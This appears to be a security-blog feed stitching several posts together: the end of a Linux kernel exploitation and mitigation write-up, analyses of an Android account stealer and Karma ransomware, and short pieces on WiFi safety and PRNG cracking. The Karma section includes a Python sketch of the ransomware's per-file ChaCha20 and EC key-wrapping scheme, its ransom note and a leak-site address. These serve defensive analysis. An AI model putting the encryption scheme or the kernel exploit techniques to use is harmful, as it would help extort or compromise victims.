This explains the grouping of the numbers we saw: Each block of 32 contiguous values corresponds to an order-1 page that was previously empty and is used by SLUB to allocate objects until it becomes full.

With that knowledge, we can transform those numbers a bit, to show the order in which objects were allocated inside each page (excluding pages for which we haven't seen all allocations):

$ cat slub_demo.py 
#!/usr/bin/env python3
blocks = [
  [ 36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19 ],
  [ 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110 ],
  [ 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10 ],
  [ 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118 ],
  [ 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81 ],
  [ 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160 ],
  [ 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184 ]
]

for alloc_indices in blocks:
  if len(alloc_indices) != 32:
    continue
  # indices of allocations ('data'), sorted by memory location, shifted to be relative to the block
  alloc_indices_relative = [position - min(alloc_indices) for position in alloc_indices]
  # reverse mapping: memory locations of allocations,
  # sorted by index of allocation ('data').
  # if we've observed all allocations in a page,
  # these will really be indices into the page.
  memory_location_by_index = [alloc_indices_relative.index(idx) for idx in range(0, len(alloc_indices))]
  print(memory_location_by_index)
$ ./slub_demo.py
[31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17]
[16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14]
[23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27]
[20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2]
[5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15]

And these sequences are almost the same, except that they have been rotated around by different amounts. This is exactly the SLUB freelist randomization scheme, as introduced in commit 210e7a43fa905!

When a SLUB kmem_cache is created (an instance of the SLUB allocator for a specific size class and potentially other specific attributes, usually initialized at boot time), init_cache_random_seq and cache_random_seq_create fill an array ->random_seq with randomly-ordered object indices via Fisher-Yates shuffle, with the array length equal to the number of objects that fit into a page. Then, whenever SLUB grabs a new page from the lower-level page allocator, it initializes the page freelist using the indices from ->random_seq, starting at a random index in the array (and wrapping around when the end is reached). (I'm ignoring the low-order allocation fallback here.)
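
The rotation behavior observed above can be reproduced in a few lines of Python; this is a simplified model of ->random_seq, not the kernel code itself:

#!/usr/bin/env python3
import random

objs_per_slab = 32

# one Fisher-Yates shuffle per kmem_cache (cache_random_seq_create)
random_seq = list(range(objs_per_slab))
random.shuffle(random_seq)

# each new page uses the same sequence, starting at a random offset
def page_freelist_order():
  start = random.randrange(objs_per_slab)
  return random_seq[start:] + random_seq[:start]

for _ in range(3):
  print(page_freelist_order())

Every page's freelist is a rotation of the same shuffled sequence, which is why observing the allocation order within one page reveals the order in every other page of the same cache.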

So in summary, we can bypass SLUB randomization for the slab from which struct file is allocated because someone used it as a lookup key in a specific type of data structure. This is already fairly undesirable if SLUB randomization is supposed to provide protection against some types of local attacks for all slabs.

The heap-randomization-weakening effect of such data structures is not necessarily limited to cases where elements of the data structure can be listed in-order by userspace: If there was a codepath that iterated through the tree in-order and freed all tree nodes, that could have a similar effect, because the objects would be placed on the allocator's freelist sorted by address, cancelling out the randomization. In addition, you might be able to leak information about iteration order through cache side channels or such.

If we introduce a probabilistic use-after-free mitigation that relies on attackers not being able to learn whether the uppermost bits of an object's address changed after it was reallocated, this data structure could also break that. This case is messier than things like kcmp() because here the address ordering leak stems from a standard data structure.

You may have noticed that some of the examples I'm using here would be more or less limited to cases where an attacker is reallocating memory with the same type as the old allocation, while a typical use-after-free attack ends up replacing an object with a differently-typed one to cause type confusion. As an example of a bug that can be exploited for privilege escalation without type confusion at the C structure level, see entry 808 in our bugtracker. My exploit for that bug first starts a writev() operation on a writable file, lets the kernel validate that the file is indeed writable, then replaces the struct file with a read-only file pointing to /etc/crontab, and lets writev() continue. This allows gaining root privileges through a use-after-free bug without having to mess around with kernel pointers, data structure layouts, ROP, or anything like that. Of course that approach doesn't work with every use-after-free though.

(By the way: For an example of pointer leaks through container data structures in a JavaScript engine, see this bug I reported to Firefox back in 2016, when I wasn't a Google employee, which leaks the low 32 bits of a pointer by timing operations on pessimal hash tables - basically turning the HashDoS attack into an infoleak. Of course, nowadays, a side-channel-based pointer leak in a JS engine would probably not be worth treating as a security bug anymore, since you can probably get the same result with Spectre...)

Against freeing SLUB pages: Preventing virtual address reuse beyond the slab

(Also discussed a little bit on the kernel-hardening list in this thread.)

A weaker but less CPU-intensive alternative to trying to provide complete use-after-free protection for individual objects would be to ensure that virtual addresses that have been used for slab memory are never reused outside the slab, but that physical pages can still be reused. This would be the same basic approach as used by PartitionAlloc and others. In kernel terms, that would essentially mean serving SLUB allocations from vmalloc space.

Some challenges I can think of with this approach are:

  • SLUB allocations are currently served from the linear mapping, which normally uses hugepages; if vmalloc mappings with 4K PTEs were used instead, TLB pressure might increase, which might lead to some performance degradation.
  • To be able to use SLUB allocations in contexts that operate directly on physical memory, it is sometimes necessary for SLUB pages to be physically contiguous. That's not really a problem, but it is different from default vmalloc behavior. (Sidenote: DMA buffers don't always have to be physically contiguous - if you have an IOMMU, you can use that to map discontiguous pages to a contiguous DMA address range, just like how normal page tables create virtually-contiguous memory. See this kernel-internal API for an example that makes use of this, and Fuchsia's documentation for a high-level overview of how all this works in general.)
  • Some parts of the kernel convert back and forth between virtual addresses, struct page pointers, and (for interaction with hardware) physical addresses. This is a relatively straightforward mapping for addresses in the linear mapping, but would become a bit more complicated for vmalloc addresses. In particular, page_to_virt() and phys_to_virt() would have to be adjusted.
    • This is probably also going to be an issue for things like Memory Tagging, since pointer tags will have to be reconstructed when converting back to a virtual address. Perhaps it would make sense to forbid these helpers outside low-level memory management, and change existing users to instead keep a normal pointer to the allocation around? Or maybe you could let pointers to struct page carry the tag bits for the corresponding virtual address in unused/ignored address bits?

The probability that this defense can prevent UAFs from leading to exploitable type confusion depends somewhat on the granularity of slabs; if specific struct types have their own slabs, it provides more protection than if objects are only grouped by size. So to improve the utility of virtually-backed slab memory, it would be necessary to replace the generic kmalloc slabs (which contain various objects, grouped only by size) with ones that are segregated by type and/or allocation site. (The grsecurity/PaX folks have vaguely alluded to doing something roughly along these lines using compiler instrumentation.)

After reallocation as pagetable: Structure layout randomization

Memory safety issues are often exploited in a way that involves creating a type confusion; e.g. exploiting a use-after-free by replacing the freed object with a new object of a different type.

A defense that first appeared in grsecurity/PaX is to shuffle the order of struct members at build time to make it harder to exploit type confusions involving structs; the upstream Linux version of this is in scripts/gcc-plugins/randomize_layout_plugin.c.

How effective this is depends partly on whether the attacker is forced to exploit the issue as a confusion between two structs, or whether the attacker can instead exploit it as a confusion between a struct and an array (e.g. containing characters, pointers or PTEs). Especially if only a single struct member is accessed, a struct-array confusion might still be viable by spraying the entire array with identical elements. Against the type confusion described in this blogpost (between struct pid and page table entries), structure layout randomization could still be somewhat effective, since the reference count is half the size of a PTE and therefore can randomly be placed to overlap either the lower or the upper half of a PTE. (Except that the upstream Linux version of randstruct only randomizes explicitly-marked structs or structs containing only function pointers, and struct pid has no such marking.)
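
For context, opting a struct into upstream randstruct is a one-line annotation; the struct below is a hypothetical kernel-style fragment (not buildable in userspace), using the kernel's real __randomize_layout marker:

/* hypothetical example: request build-time member shuffling */
struct example_private_data {
	refcount_t refs;
	spinlock_t lock;
	void *buffer;
	unsigned int buffer_len;
} __randomize_layout;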

Of course, drawing a clear distinction between structs and arrays oversimplifies things a bit; for example, there might be struct types that have a large number of pointers of the same type or attacker-controlled values, not unlike an array.

If the attacker can not completely sidestep structure layout randomization by spraying the entire struct, the level of protection depends on how kernel builds are distributed:

  • If the builds are created centrally by one vendor and distributed to a large number of users, an attacker who wants to be able to compromise users of this vendor would have to rework their exploit to use a different type confusion for each release, which may force the attacker to rewrite significant chunks of the exploit.
  • If the kernel is individually built per machine (or similar), and the kernel image is kept secret, an attacker who wants to reliably exploit a target system may be forced to somehow leak information about some structure layouts and either prepare exploits for many different possible struct layouts in advance or write parts of the exploit interactively after leaking information from the target system.

To maximize the benefit of structure layout randomization in an environment where kernels are built centrally by a distribution/vendor, it would be necessary to make randomization a boot-time process by making structure offsets relocatable. (Or install-time, but that would break code signing.) Doing this cleanly (for example, such that 8-bit and 16-bit immediate displacements can still be used for struct member access where possible) would probably require a lot of fiddling with compiler internals, from the C frontend all the way to the emission of relocations. A somewhat hacky version of this approach already exists for C->BPF compilation as BPF CO-RE, using the clang builtin __builtin_preserve_access_index, but that relies on debuginfo, which probably isn't a very clean approach.

Potential issues with structure layout randomization are:

  • If structures are hand-crafted to be particularly cache-efficient, fully randomizing structure layout could worsen cache behavior. The existing randstruct implementation optionally avoids this by trying to randomize only within a cache line.
  • Unless the randomization is applied in a way that is reflected in DWARF debug info and such (which it isn't in the existing GCC-based implementation), it can make debugging and introspection harder.
  • It can break code that makes assumptions about structure layout; but such code is gross and should be cleaned up anyway (and Gustavo Silva has been working on fixing some of those issues).

While structure layout randomization by itself is limited in its effectiveness by struct-array confusions, it might be more reliable in combination with limited heap partitioning: If the heap is partitioned such that only struct-struct confusion is possible, and structure layout randomization makes struct-struct confusion difficult to exploit, and no struct in the same heap partition has array-like properties, then it would probably become much harder to directly exploit a UAF as type confusion. On the other hand, if the heap is already partitioned like that, it might make more sense to go all the way with heap partitioning and create one partition per type instead of dealing with all the hassle of structure layout randomization.

(By the way, if structure layouts are randomized, padding should probably also be randomized explicitly instead of always being on the same side to maximally randomize structure members with low alignment; see my list post on this topic for details.)

Control Flow Integrity

I want to explicitly point out that kernel Control Flow Integrity would have had no impact at all on this exploit strategy. By using a data-only strategy, we avoid having to leak addresses, avoid having to find ROP gadgets for a specific kernel build, and are completely unaffected by any defenses that attempt to protect kernel code or kernel control flow. Things like getting access to arbitrary files, increasing the privileges of a process, and so on don't require kernel instruction pointer control.

Like in my last blogpost on Linux kernel exploitation (which was about a buggy subsystem that an Android vendor added to their downstream kernel), to me, a data-only approach to exploitation feels very natural and seems less messy than trying to hijack control flow anyway.

Maybe things are different for userspace code; but for attacks by userspace against the kernel, I don't currently see a lot of utility in CFI because it typically only affects one of many possible methods for exploiting a bug. (Although of course there could be specific cases where a bug can only be exploited by hijacking control flow, e.g. if a type confusion only permits overwriting a function pointer and none of the permitted callees make assumptions about input types or privileges that could be broken by changing the function pointer.)

Making important data readonly

A defense idea that has shown up in a bunch of places (including Samsung phone kernels and XNU kernels for iOS) is to make data that is crucial to kernel security read-only except when it is intentionally being written to - the idea being that even if an attacker has an arbitrary memory write, they should not be able to directly overwrite specific pieces of data that are of exceptionally high importance to system security, such as credential structures, page tables, or (on iOS, using PPL) userspace code pages.

The problem I see with this approach is that a large portion of the things a kernel does are, in some way, critical to the correct functioning of the system and system security. MMU state management, task scheduling, memory allocation, filesystems, page cache, IPC, ... - if any one of these parts of the kernel is corrupted sufficiently badly, an attacker will probably be able to gain access to all user data on the system, or use that corruption to feed bogus inputs into one of the subsystems whose own data structures are read-only.

In my view, instead of trying to split out the most critical parts of the kernel and run them in a context with higher privileges, it might be more productive to go in the opposite direction and try to approximate something like a proper microkernel: Split out drivers that don't strictly need to be in the kernel and run them in a lower-privileged context that interacts with the core kernel through proper APIs. Of course that's easier said than done! But Linux does already have APIs for safely accessing PCI devices (VFIO) and USB devices from userspace, although userspace drivers aren't exactly its main usecase.

(One might also consider making page tables read-only not because of their importance to system integrity, but because the structure of page table entries makes them nicer to work with in exploits that are constrained in what modifications they can make to memory. I dislike this approach because I think it has no clear conclusion and it is highly invasive regarding how data structures can be laid out.)

Conclusion

This was essentially a boring locking bug in some random kernel subsystem that, if it wasn't for memory unsafety, shouldn't really have much of a relevance to system security. I wrote a fairly straightforward, unexciting (and admittedly unreliable) exploit against this bug; and probably the biggest challenge I encountered when trying to exploit it on Debian was to properly understand how the SLUB allocator works.

My intent in describing the exploit stages, and how different mitigations might affect them, is to highlight that the further a memory corruption exploit progresses, the more options an attacker gains; and so as a general rule, the earlier an exploit is stopped, the more reliable the defense is. Therefore, even if defenses that stop an exploit at an earlier point have higher overhead, they might still be more useful.

I think that the current situation of software security could be dramatically improved - in a world where a little bug in some random kernel subsystem can lead to a full system compromise, the kernel can't provide reliable security isolation. Security engineers should be able to focus on things like buggy permission checks and core memory management correctness, and not have to spend their time dealing with issues in code that ought to not have any relevance to system security.

In the short term, there are some band-aid mitigations that could be used to improve the situation - like heap partitioning or fine-grained UAF mitigation. These might come with some performance cost, and that might make them look unattractive; but I still think that they're a better place to invest development time than things like CFI, which attempts to protect against much later stages of exploitation.

In the long term, I think something has to change about the programming language - plain C is simply too error-prone. Maybe the answer is Rust; or maybe the answer is to introduce enough annotations to C (along the lines of Microsoft's Checked C project, although as far as I can see they mostly focus on things like array bounds rather than temporal issues) to allow Rust-equivalent build-time verification of locking rules, object states, refcounting, void pointer casts, and so on. Or maybe another completely different memory-safe language will become popular in the end, neither C nor Rust?

My hope is that perhaps in the mid-term future, we could have a statically verified, high-performance core of kernel code working together with instrumented, runtime-verified, non-performance-critical legacy code, such that developers can make a tradeoff between investing time into backfilling correct annotations and run-time instrumentation slowdown without compromising on security either way.

TL;DR

Memory corruption is a big problem because small bugs, even outside security-related code, can lead to a complete system compromise; and to address that, it is important that we:

  • in the short to medium term:

    • design new memory safety mitigations:
      • ideally, that can stop attacks at an early point where attackers don't have a lot of alternate options yet
        • maybe at the memory allocator level (i.e. SLUB)
      • that can't be broken using address tag leaks (or we try to prevent tag leaks, but that's really hard)
    • continue using attack surface reduction
      • in particular seccomp
    • explicitly prevent untrusted code from gaining important attack primitives
      • like FUSE, and potentially consider fine-grained scheduler control
  • in the long term:

    • statically verify correctness of most performance-critical code
      • this will require determining how to retrofit annotations for object state and locking onto legacy C code
      • consider designing runtime verification just for gaps in static verification

Social Network Account Stealers Hidden in Android Gaming Hacking Tool

19 October 2021 at 13:02

Authored by: Wenfeng Yu

McAfee Mobile Research team recently discovered a new piece of malware that specifically steals Google, Facebook, Twitter, Telegram, and PUBG game accounts. This malware hides in “DesiEsp,” an assistant tool for the PUBG game that is available on GitHub. Cybercriminals added their own malicious code on top of this open-source tool and published the result on Telegram. PUBG players are the main targets of this Android malware in all regions around the world, but most infections are reported from the United States, India, and Saudi Arabia. 

What is an ESP hack? 

ESP hacks (short for Extra-Sensory Perception) are a type of hack that displays player information such as HP (health points), name, rank, gun, and so on. It is like a permanently tuned-up KDR/HP vision. ESP hacks are not a single hack, but a whole category of hacks that function similarly and are often used together to make them more effective. 

How can you be affected by this malware? 

Our investigation found that this malware is spread through Telegram channels related to the PUBG game. Fortunately, this malware has not been found on Google Play. 

Figure 1. Re-packaged hacking tool distributed in Telegram

Main dropper behavior 

After it runs, the malware asks the user to grant superuser permission: 

Figure 2. Initial malware requesting root access.

If the user denies the superuser request, the malware warns that the application may not work: 

Figure 3. Error message when root access is not provided

Once it gains root permission, it starts two malicious actions. First, it steals accounts by accessing the system account database and application databases.  

Figure 4. Getting a Google account from the Android system account database.

Second, it installs an additional payload with the package name “com.android.google.gsf.policy_sidecar_aps” using the “pm install” command. The payload package is stored in the assets folder, with its file name disguised as “*.crt” or “*.mph”. 

Figure 5. Payload disguised as a certificate file (crt extension)

Stealing social and gaming accounts 

The dropped payload displays no icon and does not operate directly on the screen of the user’s device. In the apps list of the system settings, it disguises its package name as something like “com.google.android.gsf” to make users think it is a Google system service. It runs in the background as an accessibility service. Accessibility services are an assistive feature of the Android system that helps people with physical disabilities use mobile apps; such a service attaches to other apps like a plug-in and can access the Activity, View, and other resources of the connected app. 

The malware first tries to obtain root permissions and the IMEI (International Mobile Equipment Identity) code, which it later uses when accessing the system account database. Even without root access, it still has other ways to steal account information. Finally, it also tries to activate device admin to make its removal more difficult. 

Methods to steal account information 

The first method this malware uses to steal account credentials is to monitor the login window and the text of account input boxes of the targeted app through the AccessibilityService interface. The target apps include Facebook (com.facebook.katana), Twitter (com.twitter.android), Google (com.google.android.gms), and the PUBG MOBILE game (com.tencent.ig). 

The second method is to steal account information (including account number, password, key, and token) by accessing the system account database, the user config file, and the database of the monitored app. This part of the malicious code is the same as in the parent sample above:

Figure 6. Malware accessing Facebook account information using root privileges

Finally, the malware reports the stolen account information to the attacker’s server via HTTP.

Gaming users infected worldwide 

PUBG is popular all over the world, and users of PUBG assistant tools exist in every region. According to McAfee telemetry data, this malware and its variants affect a wide range of countries, including the United States, India, and Saudi Arabia:

Figure 7. Top affected countries include USA, India, and Saudi Arabia

Conclusion 

The online game market is being revitalized, as the rise of e-sports shows. We can play games anywhere, in various environments such as mobiles, tablets, and PCs (personal computers). Some users look for cheat tools and hacking techniques to play the game with a slight advantage. By their nature, cheat tools are inevitably hosted on suspicious websites, and users looking for them must venture onto those sites. Attackers are aware of these users’ desires and use cheat tools as a lure to attack them.

This malware is still constantly producing variants that use several techniques to counter detection by anti-virus software, including packing, code obfuscation, and string encryption, allowing it to infect more game users.

McAfee Mobile Security detects this threat as Android/Stealer and protects you from this malware attack. Use security software on your device, and think twice before downloading and installing cheat tools, especially when they request superuser or accessibility service permissions.

Indicators of Compromise 

Dropper samples 

36d9e580c02a196e017410a6763f342eea745463cefd6f4f82317aeff2b7e1a5

fac1048fc80e88ff576ee829c2b05ff3420d6435280e0d6839f4e957c3fa3679

d054364014188016cf1fa8d4680f5c531e229c11acac04613769aa4384e2174b

3378e2dbbf3346e547dce4c043ee53dc956a3c07e895452f7e757445968e12ef

7e0ee9fdcad23051f048c0d0b57b661d58b59313f62c568aa472e70f68801417

6b14f00f258487851580e18704b5036e9d773358e75d01932ea9f63eb3d93973

706e57fb4b1e65beeb8d5d6fddc730e97054d74a52f70f57da36eda015dc8548

ff186c0272202954def9989048e1956f6ade88eb76d0dc32a103f00ebfd8538e

3726dc9b457233f195f6ec677d8bc83531e8bc4a7976c5f7bb9b2cfdf597e86c

e815b1da7052669a7a82f50fabdeaece2b73dd7043e78d9850c0c7e95cc0013d

Payload samples 

8ef54eb7e1e81b7c5d1844f9e4c1ba8baf697c9f17f50bfa5bcc608382d43778

4e08e407c69ee472e9733bf908c438dbdaebc22895b70d33d55c4062fc018e26

6e7c48909b49c872a990b9a3a1d5235d81da7894bd21bc18caf791c3cb571b1c

9099908a1a45640555e70d4088ea95e81d72184bdaf6508266d0a83914cc2f06

ca29a2236370ed9979dc325ea4567a8b97b0ff98f7f56ea2e82a346182dfa3b8

d2985d3e613984b9b1cba038c6852810524d11dddab646a52bf7a0f6444a9845

ef69d1b0a4065a7d2cc050020b349f4ca03d3d365a47be70646fd3b6f9452bf6

06984d4249e3e6b82bfbd7da260251d99e9b5e6d293ecdc32fe47dd1cd840654

Domain 

hosting-b5476[.]gq 

The post Social Network Account Stealers Hidden in Android Gaming Hacking Tool appeared first on McAfee Blogs.

Vulnerability Spotlight: Multiple vulnerabilities in ZTE MF971R LTE router

18 October 2021 at 19:04
Marcin “Icewall” Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.  Cisco Talos recently discovered multiple vulnerabilities in the ZTE MF971R LTE portable router.  The MF971R is a portable router with Wi-Fi support and works as an LTE/GSM modem. An attacker could...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Karma Ransomware | An Emerging Threat With A Hint of Nemty Pedigree

18 October 2021 at 16:43

Karma is a relatively new ransomware threat actor, having first been observed in June of 2021. The group has targeted numerous organizations across different industries. Reports of a group with the same name from 2016 are not related to the actors currently using the name. An initial technical analysis of a single sample related to Karma was published by researchers from Cyble in August.

In this post, we take a deeper dive, focusing on the evolution of Karma through multiple versions of the malware appearing through June 2021. In addition, we explore the links between Karma and other well known malware families such as NEMTY and JSWorm and offer an expanded list of technical indicators for threat hunters and defenders.

Initial Sample Analysis

Karma’s development has been fairly rapid and regular with updated variants and improvements, oftentimes building multiple versions on the same day. The first few Karma samples our team observed were:

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f

Sample 1 was compiled on June 18, 2021, and Samples 2 and 3 the following day, June 19, a few minutes apart. The basic configuration of these samples is similar, though there are some slight differences, such as PDB paths.

After Sample 1, we see more of the core features appear, including the writing of the ransom note. Upon execution, these payloads enumerate all local drives (A to Z) and encrypt files where possible.

Further hunting revealed a number of other related samples, all compiled within a few days of each other. The following table illustrates compilation timestamps and payload size across versions of Karma compiled in a single week. Note how the payload size decreases as the authors iterate.

Ransom Note is not Created in Sample 1.

Also, the list of excluded extensions is somewhat larger in Sample 1 than in Samples 2 and 3, and from Sample 5 onwards it is further reduced to exclude only “.exe”, “.ini”, “.dll”, “.url” and “.lnk”.

The list of excluded extensions is reduced as the malware authors iterate

Encryption Details

From Sample 2 onwards, the malware calls CreateIoCompletionPort, which is used for communication between the main thread and the sub-thread(s) handling the encryption process. This call is key to the efficiency of the encryption process (parallelization, in this case).

Individual files are encrypted by way of a random Chacha20 key. Once files are encrypted, the malware will encrypt the random Chacha20 key with the public ECC key and embed it in the encrypted file.

Chacha Encryption
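
To make the scheme concrete, here is a minimal Python sketch (not Karma’s actual code) of the hybrid construction described above: a random per-file ChaCha20 key encrypts the data, and that key is wrapped with the operator’s public EC key. The ECIES-style wrap (ephemeral ECDH plus HKDF) and all names here are assumptions for illustration; the malware’s exact construction may differ.

import os
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

def encrypt_blob(data: bytes, recipient_pub: ec.EllipticCurvePublicKey) -> bytes:
    file_key, nonce = os.urandom(32), os.urandom(16)    # fresh ChaCha20 key per file
    ct = Cipher(algorithms.ChaCha20(file_key, nonce), mode=None).encryptor().update(data)
    eph = ec.generate_private_key(recipient_pub.curve)  # ephemeral key for the wrap
    shared = eph.exchange(ec.ECDH(), recipient_pub)
    pad = HKDF(hashes.SHA256(), 32, None, b"keywrap").derive(shared)
    wrapped = bytes(a ^ b for a, b in zip(file_key, pad))
    eph_pub = eph.public_key().public_bytes(
        serialization.Encoding.X962, serialization.PublicFormat.CompressedPoint)
    # Embed the wrapped key material alongside the ciphertext, as described above
    return ct + nonce + eph_pub + wrapped

Only the holder of the matching EC private key can unwrap the per-file key, which is what forces victims to deal with the operators.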

Across Samples 2 to 5, the author removed the CreateIoCompletionPort call, instead opting to create a new thread to manage enumeration and encryption per drive. We also note the “KARMA” mutex created to prevent the malware from running more than once. Ransom note names have also been updated to “KARMA-ENCRYPTED.txt”.

Diving in deeper, some samples show that the ChaCha20 algorithm has been swapped out for Salsa20, and the asymmetric ECC algorithm has been swapped from Secp256k1 to Sect233r1. Some updates around execution also began to appear during this time, such as support for command-line parameters.

A few changes were noted in Samples 6 and 7. The main difference is the newly included background image: the file “background.jpg” is written to %TEMP% and set as the desktop wallpaper for the logged-in user.

Desktop image change and message

Malware Similarity Analysis

From our analysis, we see similarities between JSWorm and the associated permutations of that ransomware family such as NEMTY, Nefilim, and GangBang. Specifically, the Karma code analyzed bears close similarity to the GangBang or Milihpen variants that appeared around January 2021.

Some high-level similarities are visible in the configurations.

We can see deeper relationships when we conduct a bindiff on Karma and GangBang samples. The following image shows how similar the main() functions are:

The main() function & argument processing in Gangbang (left) and Karma

Victim Communication

The main body of the ransom note text hasn’t changed since the first sample and still contains mistakes. The ransom notes are base64-encoded in the binary and dropped on the victim machine with the filename “KARMA-AGREE.txt” or, in later samples, “KARMA-ENCRYPTED.txt”.

Your network has been breached by Karma ransomware group.
We have extracted valuable or sensitive data from your network and encrypted the data on your systems.
Decryption is only possible with a private key that only we posses.
Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.
Scamming is just bad for business in this line of work.
Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.
We advise you not to use any data recovery tools without leaving copies of the initial encrypted file.
You are risking irreversibly damaging the file by doing this.
If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.
http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/

If a ransom is payed we will provide the decryption key and proof that we deleted you data.
When you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.

How to contact us:

{[email protected]}
{[email protected]}
{[email protected]}

Each sample observed offers three contact emails, one for each of the mail providers onionmail, tutanota, and protonmail. In each sample, the contact emails are unique, suggesting they are specific communication channels per victim. The notes contain no other unique ID or victim identifier as sometimes seen in notes used by other ransomware groups.

In common with other operators, however, the Karma ransom demand threatens to leak victim data if the victim does not pay. The address of a common leaks site where the data will be published is also given in the note. This website page appears to have been authored in May 2021 using WordPress.

The Karma Ransomware Group’s Onion Page

Conclusion

Karma is a young and hungry ransomware operation. The group is aggressive in its targeting and shows no reluctance in following through with its threats. The apparent similarities to the JSWorm family are also highly notable, as they could indicate that the group is more than it appears. The rapid iteration over recent months suggests the actor is investing in development and aims to be around for the foreseeable future. SentinelLabs continues to follow and analyze the development of Karma ransomware.

Indicators of Compromise

SHA1s
Karma Ransomware

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f
Sample 4: c4cd4da94a2a1130c0b9b1bf05552e06312fbd14
Sample 5: bb088c5bcd5001554d28442bbdb144b90b163cc5
Sample 6: 5ff1cd5b07e6c78ed7311b9c43ffaa589208c60b
Sample 7: 08f1ef785d59b4822811efbc06a94df16b72fea3
Sample 8: b396affd40f38c5be6ec2fc18550bbfc913fc7ea

Gangbang Sample 
ac091ce1281a16f9d7766a7853108c612f058c09

Karma Desktop image
%TEMP%/background.jpg
7b8c45769981344668ce09d48ace78fae50d71bc

Victim Blog (TOR)
http[:]//3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd[.]onion/

Ransom Note Email Addresses
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

MITRE ATT&CK
T1485 Data Destruction
T1486 Data Encrypted for Impact
T1012 Query Registry
T1082 System Information Discovery
T1120 Peripheral Device Discovery
T1204 User Execution
T1204.002 User Execution: Malicious File

Is Using Public WiFi Safe?

18 October 2021 at 13:30

Using public WiFi can leave you and your employees open to man-in-the-middle cyber attacks. With the increase of remote work, organizations must teach their employees how to stay safe on open WiFi networks. Get our tips on how to protect against hackers while on open WiFi networks.

The post Is Using Public WiFi Safe? appeared first on VerSprite.

Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister

18 October 2021 at 13:00

1. Introduction

In part 1 of this post, we showed how to train a Neural Network to generate the exact sequence of a relatively simple pseudo-random number generator (PRNG), namely xorshift128. In that PRNG, each number is totally dependent on the last four generated numbers (which form the random number internal state). Although ML had learned the hidden internal structure of the xorshift128 PRNG, it is a very simple PRNG that we used as a proof of concept.

The same concept applies to a more complex structured PRNG, namely the Mersenne Twister (MT). MT is by far the most widely used general-purpose (but still not cryptographically secure) PRNG [1]. It has a very long period (2^19937 - 1 for the most common variant) and generates 32-bit words with a statistically uniform distribution. There are many variants of the MT PRNG that follow the same algorithm but differ in the constants and configurations of the algorithm. The most commonly used variant of MT is MT19937, so for the rest of this article we will focus on this variant.

To crack the MT algorithm, we need first to examine how it works. In the next section, we will discuss how MT works.

** Editor’s Note: How does this relate to security? While both the research in this blog post (and that of Part 1 in this series) looks at a non-cryptographic PRNG, we are interested, generically, in understanding how machine learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use machine learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space, extending the approach used for xorshift128 to Mersenne Twister, a non-cryptographic PRNG sometimes mistakenly used where a cryptographically-secure PRNG is required. **

2. How does MT19937 PRNG work?

MT can be considered a twisted form of the generalized linear-feedback shift register (LFSR). The idea of an LFSR is to use a linear function, such as XOR, with the old register value to get the register’s new value. In MT, the internal state is saved as a sequence of 32-bit words. The size of the internal state differs between MT variants; in the case of MT19937 it is 624. The pseudocode of MT, as shared on Wikipedia, is listed below.

 // Create a length n array to store the state of the generator
